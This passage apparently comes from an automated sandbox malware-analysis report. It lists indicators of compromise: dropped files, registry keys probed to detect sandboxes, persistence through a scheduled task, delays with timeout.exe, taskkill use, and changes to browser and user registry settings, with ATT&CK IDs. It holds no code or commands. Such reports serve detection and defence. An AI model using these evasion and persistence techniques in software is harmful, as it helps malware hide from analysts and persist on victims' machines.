File created	C:\Program Files (x86)\I-record\is-KNP0J.tmp	irecord.tmp
File created	C:\Program Files (x86)\Install engine 16\is-TIMLC.tmp	IBInstaller_97039.tmp

Drops file in Windows directory 38 IoCs

Processes:

DrvInst.exemsiexec.exemultitimer.exeMicrosoftEdge.exeexpand.exemultitimer.exeFull Program Features.exeWerFault.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exesvchost.exeDrvInst.exeexplorer.exe

description	ioc	process
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI3588.tmp	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI3819.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Installer\f752ed1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5417.tmp	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	Full Program Features.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI3924.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DAA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI503D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4E96.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Installer\f752ed1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DDA.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Installer\MSI3D9B.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C14.tmp	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	explorer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	explorer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

svchost.exetapinstall.exetoolspab1.exeDrvInst.exesvchost.exeFull Program Features.exetoolspab1.exeDrvInst.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	Full Program Features.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	Full Program Features.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	Full Program Features.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

client32.exesvchost.exeloli.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	client32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	loli.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	loli.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	client32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	client32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1460 schtasks.exe
Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

5800 timeout.exe
4432 timeout.exe
10156 timeout.exe
3756 timeout.exe
7484 timeout.exe
8524 timeout.exe
7808 timeout.exe

pid	process
1460	schtasks.exe

pid	process
5800	timeout.exe
4432	timeout.exe
10156	timeout.exe
3756	timeout.exe
7484	timeout.exe
8524	timeout.exe
7808	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.execlient32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	client32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	client32.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5976	taskkill.exe
7676	taskkill.exe
5064	taskkill.exe
1772	taskkill.exe
192	taskkill.exe
7160	taskkill.exe
4268	taskkill.exe
9020	taskkill.exe
5672	taskkill.exe
4700	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

vict.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	vict.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

mask_svc.exesvchost.exeDrvInst.exefile.exefile.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2061 = "North Korea Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	mask_svc.exe
